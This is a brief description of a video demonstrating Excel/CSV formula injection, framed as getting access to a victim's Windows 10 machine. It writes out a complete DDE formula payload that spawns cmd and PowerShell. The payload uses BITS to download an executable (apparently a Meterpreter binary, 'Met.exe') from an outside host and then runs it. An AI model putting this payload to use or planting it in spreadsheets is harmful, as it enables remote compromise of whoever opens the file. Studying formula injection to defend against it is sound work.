Excel Formula Injection

The video depicts about the CSV Injection attacks which was discovered by James Kettle. So this video is going to be about Excel formula injection and getting access of victim machine (Windows 10) with power shell Module BITS(Background Intelligence Transfer Service) Transfer for Malicious file transfer and starting the process.

The code written in the Excel sheet are:

=cmd| ‘/C powershell Import-Module BitsTransfer;Start-BitsTransfer -source hxxp://xx.xx.xx.xx/Met.exe;Start-Process Met.exe’ !A0

Mentioning the code since it’s not properly visible in the video.



